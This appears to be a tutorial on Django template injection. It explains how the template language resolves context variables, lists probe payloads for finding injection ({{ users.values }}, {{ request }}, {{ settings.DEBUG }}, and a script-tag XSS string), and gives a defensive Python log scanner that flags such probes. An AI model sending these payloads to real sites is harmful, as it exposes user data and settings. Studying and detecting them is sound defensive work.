Django's own template system is called the Django template language (DTL).
As a web framework, Django needs a way to generate HTML dynamically. A Django template is a text document or a Python string marked up using the Django template language. Normal Jinja payloads like {{ 7*7 }} or {{os.environ}} will not work; they will be rendered as text because Django only resolves context variables.
Context Variables
These are the key/value pairs of the dictionary that the view passes to the template. Variables are placed within {{ and }}. https://docs.djangoproject.com/en/5.2/topics/templates/#variables
My first name is {{ first_name }}. My last name is {{ last_name }}.
first_name and last_name here are the context variables.
The dictionary which contains the context variables for a specific user would look like
{'first_name': 'John', 'last_name': 'Doe'}
which will render to
My first name is John. My last name is Doe.
So only variables that are defined in the dictionary can be referenced, which explains why {{7*7}} won't work.
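To make the resolution rules concrete, here is an added illustration written for this page; it is not Django's code. It is a stripped-down model of how the Django template language resolves a {{ ... }} tag: each dotted part is tried as a dictionary key, then an attribute, then a list index, and a callable result is called (Django's documented lookup order). There is no expression evaluator, so the real engine rejects 7*7 with a TemplateSyntaxError at parse time, while a name that is simply absent from the context renders as the empty string. Filters (|) and {% %} tags are left out. The Account class, the hash placeholders and the sample context are constructed here to show what a view exposes when it hands whole objects to the template.

```python
# Added illustration, not Django's code: a stripped-down model of how the
# Django template language resolves {{ ... }} against a context dictionary.
import re

STRING_IF_INVALID = ""  # Django's default output for a variable it cannot resolve

VAR_TAG = re.compile(r"{{\s*(?P<var>.*?)\s*}}")
DOTTED_NAME = re.compile(r"^[\w.]+$")
NUMBER = re.compile(r"^[-+.]?\d[\d.e]*$")


class TemplateSyntaxError(Exception):
    """Stands in for django.template.TemplateSyntaxError."""


def resolve(var, context):
    """Resolve one dotted variable name against the context the way DTL does.

    Each dotted part is tried as a dictionary key, then an attribute, then a
    list index, and a callable result is called. Nothing is evaluated as an
    expression: a token that is not a number or a dotted name is rejected.
    """
    if NUMBER.match(var):
        return var                                  # {{ 7 }} is a numeric literal
    if not DOTTED_NAME.match(var):
        raise TemplateSyntaxError(f"Could not parse {var!r}")   # e.g. 7*7
    current = context
    for bit in var.split("."):
        if bit.startswith("_"):
            raise TemplateSyntaxError("Variables and attributes may not begin with underscores")
        try:
            current = current[bit]                  # 1. dictionary lookup
        except (TypeError, AttributeError, KeyError, ValueError, IndexError):
            try:
                current = getattr(current, bit)     # 2. attribute lookup
            except (TypeError, AttributeError):
                try:
                    current = current[int(bit)]     # 3. list-index lookup
                except (IndexError, ValueError, KeyError, TypeError):
                    return STRING_IF_INVALID        # silently empty, never an error
        if callable(current):
            if getattr(current, "do_not_call_in_templates", False):
                continue                            # left uncalled, as in Django
            if getattr(current, "alters_data", False):
                return STRING_IF_INVALID            # Django refuses to call it
            current = current()
    return current


def render(template, context):
    """Replace every {{ var }} in the template string with its resolved value."""
    return VAR_TAG.sub(lambda m: str(resolve(m.group("var"), context)), template)


def raises_syntax_error(template, context):
    """True if rendering the template is rejected at parse time."""
    try:
        render(template, context)
    except TemplateSyntaxError:
        return True
    return False


class Account:
    """Constructed stand-in for a user model instance (not a Django model)."""

    def __init__(self, username, password_hash):
        self.username = username
        self.password_hash = password_hash
        self._note = "leading underscore: unreachable from a template"

    def delete(self):
        self.username = None
        return "deleted"

    delete.alters_data = True   # Django's own convention for blocking calls from templates


def sample_context():
    """Constructed context in the shape a careless view might pass to a template."""
    return {
        "first_name": "John",
        "last_name": "Doe",
        "users": [Account("alice", "HASH-PLACEHOLDER-1"), Account("bob", "HASH-PLACEHOLDER-2")],
        "settings": {"DEBUG": True},
    }


if __name__ == "__main__":
    ctx = sample_context()
    for t in ("My first name is {{ first_name }}. My last name is {{ last_name }}.",
              "{{ os.environ }}", "{{ users.1.username }}", "{{ users.0.password_hash }}",
              "{{ settings.DEBUG }}", "{{ users.0.delete }}"):
        print(f"{t!r} -> {render(t, ctx)!r}")
    print("{{ 7*7 }} rejected:", raises_syntax_error("{{ 7*7 }}", ctx))
```

The defensive lesson sits in sample_context: once a list of model instances or a settings object is in the context, every public attribute and every method without alters_data is one dotted name away, so views should pass only the fields the page needs.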
Finding injection
These names depend on what the programmer used to define the variables, so either user or username could be in use. Inject different values and check the responses.
# Might return username or AnonymousUser
{{ user }}
# Could return all user data
{{ users.values }}
# Index user
{{ users.3.username }}
# Request object
{{ request }}
# Example
{{ messages }}
{{ request }}
{{ settings.DEBUG }}
# XSS
{{'<script>alert(1)</script>'}}
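Seen from the defending side, the probe list above is also a detection signature: legitimate form input almost never contains {{ or {%. The following is an added example, not part of the original notes, that decodes the query string of constructed request lines and reports every parameter carrying template syntax, labelling the context name it reaches for (the names from the list above) or marking a quoted string literal, which is the XSS probe. The "METHOD path?query" line format and all sample lines are constructed for the example, not a real server's log format.

```python
# Added example (not from the original notes): flag request parameters that
# carry Django template syntax so that template-injection probes surface in logs.
import re
from urllib.parse import parse_qsl, urlsplit

TAG_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Context names from the probe list that leak the most when a view exposes them.
WATCHED_NAMES = {"user", "users", "request", "settings", "messages"}


def find_template_syntax(text):
    """Return every {{ ... }} or {% ... %} fragment in an already-decoded value."""
    return TAG_RE.findall(text)


def classify(tag):
    """Name the first thing a tag reaches for; 'literal' marks a quoted string (the XSS probe)."""
    inner = tag[2:-2].strip()
    if inner and inner[0] in "'\"":
        return "literal"
    first = re.split(r"[.|\s]", inner, maxsplit=1)[0]
    return first if first in WATCHED_NAMES else "other"


def scan_request_line(line):
    """Decode the query string of one constructed 'METHOD path?query' line and report hits."""
    _method, _, target = line.partition(" ")
    query = urlsplit(target).query
    hits = []
    for param, value in parse_qsl(query, keep_blank_values=True):
        for tag in find_template_syntax(value):
            hits.append({"param": param, "tag": tag, "kind": classify(tag)})
    return hits


def scan_log(lines):
    """Return only the lines that carry template syntax, each with its findings."""
    findings = []
    for line in lines:
        hits = scan_request_line(line)
        if hits:
            findings.append({"line": line, "hits": hits})
    return findings


# Constructed sample: one benign request followed by URL-encoded probes from the list above.
SAMPLE_LOG = [
    "GET /profile?name=John",
    "GET /profile?name=%7B%7B+user+%7D%7D",
    "GET /search?q=%7B%7B+settings.DEBUG+%7D%7D",
    "GET /profile?name=%7B%7B+users.3.username+%7D%7D",
    "GET /search?q=%7B%7B%27%3Cscript%3Ealert(1)%3C/script%3E%27%7D%7D",
    "GET /search?q=%7B%25+load+static+%25%7D",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["line"])
        for hit in finding["hits"]:
            print(f"  {hit['param']}={hit['tag']}  ({hit['kind']})")
```

The scanner is a secondary signal only: the root cause is a view that compiles user-supplied text as a template (or passes the request, settings or a queryset into the context), and the fix is to render user data only as a context value, never as template source.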